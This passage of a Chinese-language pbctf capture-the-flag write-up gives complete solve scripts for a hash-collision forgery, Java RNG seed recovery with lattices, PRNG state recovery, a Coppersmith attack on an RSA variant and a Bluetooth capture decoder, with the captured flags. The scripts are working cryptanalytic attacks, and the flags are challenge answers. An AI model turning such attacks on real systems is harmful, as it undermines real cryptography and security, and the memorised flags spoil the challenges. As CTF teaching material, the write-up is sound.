for _ in range(max_attempt):
B = bytes2ele(bytes(random.sample(ACCEPTABLE, 12)) + b'","a') - ele2
A = (C - B * H) / H2
bA = ele2bytes(ele1 + A)
if all(x in ACCEPTABLE for x in bA):
break
else:
return
assert A * H ** 2 + B * H == C
new_blocks[1] = ele2bytes(bytes2ele(new_blocks[1]) + A)
new_blocks[2] = ele2bytes(bytes2ele(new_blocks[2]) + B)
fake_token = b"".join(new_blocks)[:-2].strip(b"\0")
assert GoodHash(fake_token).digest() == GoodHash(token).digest()
return fake_token
def main():
from pwn import remote, context
context.log_level = "error"
while True:
# io = process(["python", "main.py"])
io = remote("good-hash.chal.perfect.blue", 1337)
io.recvuntil(b"Body: ")
token = io.recvline().strip()
io.recvuntil(b"Hash: ")
hexhash = io.recvlineS().strip()
assert GoodHash(token).hexdigest() == hexhash
fake = find_collision(token)
if fake:
print(fake)
print(json.loads(fake))
io.sendline(fake)
print(io.recvallS())
break
print("next")
io.close()
main()
# run this script in 8 tmux windows, then sit down and pray one of them can find the correct one in a short time...
# pbctf{GHASH_is_short_for_GoodHash_:joy:}這個非常暴力的隨機算法成功率真的相當低,但是以拿到 flag 為目標的話還是足夠的。對於每個 token 我最多只找 212 次,失敗就重新連線拿新的 token,然後把這個腳本用 tmux 在 8 個 pane 中同時執行,大概 5 分鐘左右才成功拿到 flag。
Seed Me#
import java.nio.file.Files;
import java.nio.file.Path;
import java.io.IOException;
import java.util.Random;
import java.util.Scanner;
class Main {
private static void printFlag() {
try {
System.out.println(Files.readString(Path.of("flag.txt")));
}
catch(IOException e) {
System.out.println("Flag file is missing, please contact admins");
}
}
public static void main(String[] args) {
int unlucky = 03777;
int success = 0;
int correct = 16;
System.out.println("Welcome to the 'Lucky Crystal Game'!");
System.out.println("Please provide a lucky seed:");
Scanner scr = new Scanner(System.in);
long seed = scr.nextLong();
Random rng = new Random(seed);
for(int i=0; i<correct; i++) {
/* Throw away the unlucky numbers */
for(int j=0; j<unlucky; j++) {
rng.nextFloat();
}
/* Do you feel lucky? */
if (rng.nextFloat() >= (7.331f*.1337f)) {
success++;
}
}
if (success == correct) {
printFlag();
}
else {
System.out.println("Unlucky!");
}
}
}這個題目要你找一個 seed,目標要讓 Java 17 的 Random 每隔 2047 次之後的輸出超過 7.331 * 0.1337 ~= 0.98,重複 16 次。
首先,關於 Java 17 的 Random 可以在這邊查到資料,可知它是一個簡單的 LCG。公式為 s = (s * 0x5DEECE66D + 0xb) % (2 ** 48)。而其中的 nextFloat 是以 next(24) / ((float)(1 << 24)) 的方法實作的。
要達成這個目標也就代表需要讓每隔 2047 次的 state 要很接近 m=248 才行。
因為這是 LCG,那 16 次的輸出可以寫成:
v1v2v16≡a1s+b1(modm)≡a2s+b2(modm)⋮≡a16s+b16(modm)而目標是讓 vi 盡量接近 m,也就是 m−vi>0 要夠小才行,所以 vi<m 但是卻很接近 m。利用這個和把 modulo 的部份改寫可以得到:
a1s−k1ma2s−k2ma16s−k16m=v1−b1=v2−b2⋮=v16−b16從這邊可以寫出這個 Lattice 的 Basis B:
B=1a1ma2m⋯⋱a16m設定 v=(s,−k1,⋯,−k16) 的話有 vB=(s,v1−b1,⋯,v16−b16)。
這邊我用了 Inequality Solving with CVP。你只要給予 vB 的上下界,然後它會幫你 rescale 得到一個 target vector 之後用 Babai CVP 幫你求出 vB 的值的工具,如果要 v 的話也可以很容易的解回去。
我取的 vi 上下界是直接抓大概 0.98×224×224=T×224,不過經過測試發現要抓大概 (T+150000)×224 左右才能得到大概成功 14~15 次的 seed。
可以注意到不符的地方要不是第一個值稍微小於目標值,不然就是最後一個值會稍大於 m 所以就變很小了。我的解決方法就是自己手動微調 v1 和 v16 的上下界而已,調個幾次就找到了需要的 s 作為 seed,輸入到 remote 之後就能拿到 flag。
from operator import xor
class JavaRNG:
# about the detail of java 17 rng
# https://docs.oracle.com/en/java/javase/17/docs/api/java.base/java/util/Random.html
def __init__(self, seed):
self.seed = seed
def next(self):
self.seed = self.seed * 0x5DEECE66D + 0xB
return self.seed
Z = Zmod(2 ** 48)
P = PolynomialRing(Z, "s")
s = P.gen()
aa = []
bb = []
zz = []
rng = JavaRNG(s)
for _ in range(16):
for _ in range(2047):
rng.next()
z = rng.next()
# print(z)
zz.append(z)
b, a = z.change_ring(ZZ)
aa.append(a)
bb.append(b)
# print(((ZZ(z(xs)) >> 24) / (1 << 24)).n())
M = 2 ** 48
B = block_matrix(
[[matrix([1]), matrix(aa)], [matrix(len(aa), 1), matrix.identity(len(aa)) * M]]
)
load("solver.sage") # https://github.com/rkm0959/Inequality_Solving_with_CVP
# manually changing parameters...
vlb = [M - 3100000000000 for _ in range(len(bb))]
vlb[0] = M - 2900000000000
vub = [M - 2100000000000 for _ in range(len(bb))]
vub[-1] = M - 2400000000000
lb = [0] + [v - b for v, b in zip(vlb, bb)]
ub = [2 ** 48] + [v - b for v, b in zip(vub, bb)]
result, applied_weights, fin = solve(
matrix(B), list(lb), list(ub)
) # note, this function will mutate your B, lb and ub by default
s = ZZ(fin[0])
for z in zz:
r = ZZ(z(s))
o = ((r >> 24) / (1 << 24)).n()
print(o, o > 7.331 * 0.1337)
print(
xor(s, 0x5DEECE66D)
) # Java RNG will xor your seed with 0x5DEECE66D when setting seed
# one of the good seeds = 272404351039795
# pbctf{intended_is_LLL_with_branch_and_bound_9ad09becbc4c7685}其實這題還有個不用會什麼 crypto 的另解 (從 DC 上複製來的):
package com.mycompany.app;
import com.seedfinding.latticg.reversal.*;
import com.seedfinding.latticg.reversal.calltype.java.JavaCalls;
import com.seedfinding.latticg.util.LCG;
public class App
{
public static final int unlucky = 2047;
public static void main( String[] args )
{
DynamicProgram device = DynamicProgram.create(LCG.JAVA);
for(int i=0; i<16; i++) {
device.skip(unlucky);
device.add(JavaCalls.nextFloat().greaterThan(0.98016f));
}
device.reverse().forEach(s -> System.out.println(s ^ 0x5DEECE66DL));
}
}這個用的是 LattiCG,一個和破解 Java 的 LCG 有關的 Java Library,裡面也是有用 Lattice 和一些額外的策略去搜尋的工具。
作者的 Writeup 有說明這個題目其實和搜尋 Minecraft 的 seed 有關,這個影片有些更詳細的細節在裡面。像是前面的 LattiCG 就是和這個相關的結果。
Yet Another PRNG#
#!/usr/bin/env python3
from Crypto.Util.number import *
import random
import os
from flag import flag
def urand(b):
return int.from_bytes(os.urandom(b), byteorder='big')
class PRNG:
def __init__(self):
self.m1 = 2 ** 32 - 107
self.m2 = 2 ** 32 - 5
self.m3 = 2 ** 32 - 209
self.M = 2 ** 64 - 59
rnd = random.Random(b'rbtree')
self.a1 = [rnd.getrandbits(20) for _ in range(3)]
self.a2 = [rnd.getrandbits(20) for _ in range(3)]
self.a3 = [rnd.getrandbits(20) for _ in range(3)]
self.x = [urand(4) for _ in range(3)]
self.y = [urand(4) for _ in range(3)]
self.z = [urand(4) for _ in range(3)]
def out(self):
o = (2 * self.m1 * self.x[0] - self.m3 * self.y[0] - self.m2 * self.z[0]) % self.M
self.x = self.x[1:] + [sum(x * y for x, y in zip(self.x, self.a1)) % self.m1]
self.y = self.y[1:] + [sum(x * y for x, y in zip(self.y, self.a2)) % self.m2]
self.z = self.z[1:] + [sum(x * y for x, y in zip(self.z, self.a3)) % self.m3]
return o.to_bytes(8, byteorder='big')
if __name__ == "__main__":
prng = PRNG()
hint = b''
for i in range(12):
hint += prng.out()
print(hint.hex())
assert len(flag) % 8 == 0
stream = b''
for i in range(len(flag) // 8):
stream += prng.out()
out = bytes([x ^ y for x, y in zip(flag, stream)])
print(out.hex())這題的 PRNG 類似把三個類似 LFSR 的 PRNG 結合過的結果,但是這次我們沒辦法用攻擊一般 LFSR 的 correlation attack 去做,因為 modulus 都很大。
根據上面的 code 我們可以得出這幾條等式:
xiyizioi≡a1xi−3+a2xi−2+a3xi−1(modm1)≡b1yi−3+b2yi−2+b3yi−1(modm2)≡c1zi−3+c2zi−2+c3zi−1(modm3)≡2m1xi−m3yi−m2zi(modM)未知的初始狀態是 x0,x1,x2,y0,y1,⋯。其中的 a,b,c 因為都是從一個固定 seed 的 PRNG 生成的,所以都已知。
這些等式的 modulo 部分能用利用額外的未知數 ki 來表示,所以這樣一共有 9+9*3+12=48 個未知數,但是只有 12 個輸出 s 所以會得到一個的 48x12 的係數矩陣 M 符合 vM=s。其中 v=(x0,x1,⋯,z2,k0,k1,⋯,k38)。
之後我在那個係數矩陣的右邊的 48x36 的區塊的左上和右下分別加上了大小為 24 和 12 的單位矩陣得到 48x48 的 M′,它符合 vM′=s∣∣(x0,⋯,z2,k0,⋯,k14,k27,⋯,k38)。
然後和前一題一樣使用 Inequality Solving with CVP 去解就可以了。x,y,z 的上下界明顯是 0∼232,而 k0∼k26 的上下界根據我的測試大概是 0∼220 的區間,而最後的 k27∼k38 幾乎都是落在 −3∼1 之間。
k 的區間可能和你的 k 是怎麼設的有關,不一定和我的一樣
import random
with open("output.txt") as f:
stream = bytes.fromhex(f.readline().strip())
states = [
int.from_bytes(stream[i : i + 8], "big") for i in range(0, len(stream), 8)
]
assert len(states) == 12
ct = bytes.fromhex(f.readline().strip())
m1 = 2 ** 32 - 107
m2 = 2 ** 32 - 5
m3 = 2 ** 32 - 209
M = 2 ** 64 - 59
rnd = random.Random(b"rbtree")
a1 = [rnd.getrandbits(20) for _ in range(3)]
a2 = [rnd.getrandbits(20) for _ in range(3)]
a3 = [rnd.getrandbits(20) for _ in range(3)]
numk = 9 * 3 + 12
varstr = "x0,x1,x2,y0,y1,y2,z0,z1,z2," + ",".join(f"k{i}" for i in range(numk))
P = PolynomialRing(ZZ, varstr)
x0, x1, x2, y0, y1, y2, z0, z1, z2, *ks = P.gens()
polys = []
iks = iter(ks)
xs = [x0, x1, x2]
while len(xs) != 12:
xs += [sum(x * y for x, y in zip(a1, xs[-3:])) - next(iks) * m1]
ys = [y0, y1, y2]
while len(ys) != 12:
ys += [sum(x * y for x, y in zip(a2, ys[-3:])) - next(iks) * m2]
zs = [z0, z1, z2]
while len(zs) != 12:
zs += [sum(x * y for x, y in zip(a3, zs[-3:])) - next(iks) * m3]
sts = [2 * m1 * x - m3 * y - m2 * z - next(iks) * M for x, y, z in zip(xs, ys, zs)]
M, _ = Sequence(sts).coefficient_matrix()
print(vector(_))
M = M.dense_matrix().T
A = matrix.identity(24)
A = A.augment(matrix(24, 12))
B = matrix(12, 36)
C = matrix(12, 24)
C = C.augment(matrix.identity(12))
A = A.stack(B).stack(C)
M = M.augment(A)
print(M.dimensions())
lb = states + [0] * 9 + [0] * (36 - 9 - 12) + [-3] * 12
ub = states + [2 ** 32] * 9 + [2 ** 20] * (36 - 9 - 12) + [1] * 12
load("solver.sage") # https://github.com/rkm0959/Inequality_Solving_with_CVP
result, applied_weights, fin = solve(M, list(lb), list(ub)) # `solve` will mutate M, lb and ub
# M is already rescaled, although it is zero determinant, but the freedom seems to only affects the ks parts
# so the first 9 elements are correct based on my testing script
init_states = list(M.solve_left(result)[:9])
print(init_states)
class PRNG:
def __init__(self, init_states):
self.m1 = 2 ** 32 - 107
self.m2 = 2 ** 32 - 5
self.m3 = 2 ** 32 - 209
self.M = 2 ** 64 - 59
rnd = random.Random(b"rbtree")
self.a1 = [rnd.getrandbits(20) for _ in range(3)]
self.a2 = [rnd.getrandbits(20) for _ in range(3)]
self.a3 = [rnd.getrandbits(20) for _ in range(3)]
self.x = init_states[:3]
self.y = init_states[3:6]
self.z = init_states[6:]
def out(self):
o = (
2 * self.m1 * self.x[0] - self.m3 * self.y[0] - self.m2 * self.z[0]
) % self.M
self.x = self.x[1:] + [sum(x * y for x, y in zip(self.x, self.a1)) % self.m1]
self.y = self.y[1:] + [sum(x * y for x, y in zip(self.y, self.a2)) % self.m2]
self.z = self.z[1:] + [sum(x * y for x, y in zip(self.z, self.a3)) % self.m3]
return int(o).to_bytes(8, byteorder="big")
prng = PRNG(init_states)
for o in states:
assert int(o).to_bytes(8, "big") == prng.out()
flag = b""
for blk in [ct[i : i + 8] for i in range(0, len(ct), 8)]:
flag += bytes(a ^^ b for a, b in zip(blk, prng.out()))
print(flag)
# pbctf{Wow_how_did_you_solve_this?_I_thought_this_is_super_secure._Thank_you_for_solving_this!!!}這個腳本在用 solve 的時候它會輸出 Zero Determinant,代表它會有多組解,所以 fin 的值會是 None。不過如果一樣使用 M.solve_left(result) 的話會得到其中一個可能的解,經過我的測試,雖然找出來的 v 和真正的 v 不一定相同,但是可以發現它的大部分的地方都是相同的,不同的地方都聚集在比較後面的維度上而已。
直接輸出一下可以發現 rank(M)=45,而 left kernel 中的 basis 可以發現都聚集在後面的維度 (ki) 上面,這大概是為什麼這樣能成的原因。細節可以參考我的 test.sage
*Yet Another RSA#
#!/usr/bin/env python3
from Crypto.Util.number import *
import random
def genPrime():
while True:
a = random.getrandbits(256)
b = random.getrandbits(256)
if b % 3 == 0:
continue
p = a ** 2 + 3 * b ** 2
if p.bit_length() == 512 and p % 3 == 1 and isPrime(p):
return p
def add(P, Q, mod):
m, n = P
p, q = Q
if p is None:
return P
if m is None:
return Q
if n is None and q is None:
x = m * p % mod
y = (m + p) % mod
return (x, y)
if n is None and q is not None:
m, n, p, q = p, q, m, n
if q is None:
if (n + p) % mod != 0:
x = (m * p + 2) * inverse(n + p, mod) % mod
y = (m + n * p) * inverse(n + p, mod) % mod
return (x, y)
elif (m - n ** 2) % mod != 0:
x = (m * p + 2) * inverse(m - n ** 2, mod) % mod
return (x, None)
else:
return (None, None)
else:
if (m + p + n * q) % mod != 0:
x = (m * p + (n + q) * 2) * inverse(m + p + n * q, mod) % mod
y = (n * p + m * q + 2) * inverse(m + p + n * q, mod) % mod
return (x, y)
elif (n * p + m * q + 2) % mod != 0:
x = (m * p + (n + q) * 2) * inverse(n * p + m * q + 2, mod) % mod
return (x, None)
else:
return (None, None)
def power(P, a, mod):
res = (None, None)
t = P
while a > 0:
if a % 2:
res = add(res, t, mod)
t = add(t, t, mod)
a >>= 1
return res
def random_pad(msg, ln):
pad = bytes([random.getrandbits(8) for _ in range(ln - len(msg))])
return msg + pad
p, q = genPrime(), genPrime()
N = p * q
phi = (p ** 2 + p + 1) * (q ** 2 + q + 1)
print(f"N: {N}")
d = getPrime(400)
e = inverse(d, phi)
k = (e * d - 1) // phi
print(f"e: {e}")
to_enc = input("> ").encode()
ln = len(to_enc)
print(f"Length: {ln}")
pt1, pt2 = random_pad(to_enc[: ln // 2], 127), random_pad(to_enc[ln // 2 :], 127)
M = (bytes_to_long(pt1), bytes_to_long(pt2))
E = power(M, e, N)
print(f"E: {E}")可以看到了它實作了一個類似 RSA 的東西,φ=(p2+p+1)(q2+q+1),然後還有個特殊的 add 以及 power 函數,power 單純是 add 的 double and add 版本而已。
經過一些測試可以很容易的發現 power(M, phi + 1, N) == M,所以只要能求出 d 之後就能解密。
這題我賽中的想法是注意到 d 只有 400 bits,異常的小,所以說不定能透過以 2n≈p+q 去近似 φ,用 wiener attack 得到 dk,不過實際上測試這個方法只有在 200 bits 的 d 才會成功,就這樣到比賽結束都解不掉。
解法是先推得
φ=n2+(p+q)[(p+q)+n+1]−n+1然後用 ed=1(modφ) 可知
ed=1+k(n2+(p+q)[(p+q)+n+1]−n+1)設 s=p+q 然後 mode 之後可以得到
1+k(n2+s(s+n+1)−n+1)≡0(mode)這邊的 k 和 d 同樣大小,都是 400 bits。然後 s=p+q 約 512~513 bits 左右。一個容易被忽略的盲點是 φ 是 2048 bits,所以 e 也是差不多的長度,所以 k,s 的大小符合 coppersmith 的 bounds,所以用 coppersmith 解出 s 之後就能直接分解拿 d 了。
from Crypto.Util.number import long_to_bytes
n = 144256630216944187431924086433849812983170198570608223980477643981288411926131676443308287340096924135462056948517281752227869929565308903867074862500573343002983355175153511114217974621808611898769986483079574834711126000758573854535492719555861644441486111787481991437034260519794550956436261351981910433997
e = 3707368479220744733571726540750753259445405727899482801808488969163282955043784626015661045208791445735104324971078077159704483273669299425140997283764223932182226369662807288034870448194924788578324330400316512624353654098480234449948104235411615925382583281250119023549314211844514770152528313431629816760072652712779256593182979385499602121142246388146708842518881888087812525877628088241817693653010042696818501996803568328076434256134092327939489753162277188254738521227525878768762350427661065365503303990620895441197813594863830379759714354078526269966835756517333300191015795169546996325254857519128137848289
P = PolynomialRing(Zmod(e), "k,s")
kk, ss = P.gens()
f = 1 + kk * (n ^ 2 + ss * (ss + n + 1) - n + 1)
load("~/workspace/coppersmith.sage")
k, s = small_roots(f, (2 ** 400, 2 ** 513), m=3, d=4)[0] # take ~1min
k, s = ZZ(k), ZZ(s)
print(f"{k = }")
print(f"{s = }")
sol = solve(x ^ 2 - s * x + n, (x,))
p = ZZ(sol[0].rhs())
q = ZZ(sol[1].rhs())
print(f"{p = }")
print(f"{q = }")
assert p * q == n
d = inverse_mod(e, (p ^ 2 + p + 1) * (q ^ 2 + q + 1))
print(f"{d = }")
E = (
123436198430194873732325455542939262925442894550254585187959633871500308906724541691939878155254576256828668497797665133666948295292931357138084736429120687210965244607624309318401630252879390876690703745923686523066858970889657405936739693579856446294147129278925763917931193355009144768735837045099705643710,
47541273409968525787215157367345217799670962322365266620205138560673682435124261201490399745911107194221278578548027762350505803895402642361588218984675152068555850664489960683700557733290322575811666851008831807845676036420822212108895321189197516787046785751929952668898176501871898974249100844515501819117,
)
def add(P, Q, mod):
m, n = P
p, q = Q
if p is None:
return P
if m is None:
return Q
if n is None and q is None:
x = m * p % mod
y = (m + p) % mod
return (x, y)
if n is None and q is not None:
m, n, p, q = p, q, m, n
if q is None:
if (n + p) % mod != 0:
x = (m * p + 2) * inverse_mod(n + p, mod) % mod
y = (m + n * p) * inverse_mod(n + p, mod) % mod
return (x, y)
elif (m - n ** 2) % mod != 0:
x = (m * p + 2) * inverse_mod(m - n ** 2, mod) % mod
return (x, None)
else:
return (None, None)
else:
if (m + p + n * q) % mod != 0:
x = (m * p + (n + q) * 2) * inverse_mod(m + p + n * q, mod) % mod
y = (n * p + m * q + 2) * inverse_mod(m + p + n * q, mod) % mod
return (x, y)
elif (n * p + m * q + 2) % mod != 0:
x = (m * p + (n + q) * 2) * inverse_mod(n * p + m * q + 2, mod) % mod
return (x, None)
else:
return (None, None)
def power(P, a, mod):
res = (None, None)
t = P
while a > 0:
if a % 2:
res = add(res, t, mod)
t = add(t, t, mod)
a >>= 1
return res
a, b = power(E, d, n)
print(long_to_bytes(a))
print(long_to_bytes(b))
# pbctf{I_love_to_read_crypto_papers_and_implement_the_attacks_from_them}而那個奇怪的 add 和 power 據作者所說是這篇的內容。
Misc#
BTLE#
有個 pcap 檔,wireshark 打開看到有很多 Bluetooth Low Energy 的 PDU 在,可以看出它是一端的 client 向另一方進行寫入。仔細觀察一下一些 BTATT 的 PDU 可以看到寫入的時候都有一些 index 和 data,所以我寫了個腳本試著把傳送的 flag 還原出來就解掉了。
import pyshark
cap = pyshark.FileCapture("btle.pcap")
buf = bytearray(50)
for pdu in cap:
if hasattr(pdu, "btatt") and "Prepare Write Request" in str(pdu):
btatt = pdu.btatt
b = btatt.value.binary_value
i = int(btatt.offset)
buf[i : i + len(b)] = b
print(buf)
# pbctf{b1Ue_te3Th_is_ba4d_4_y0u_jUs7_4sk_HAr0lD_b1U3tO07h}除了
pyshark,scapy好像也可以拿來讀 pcap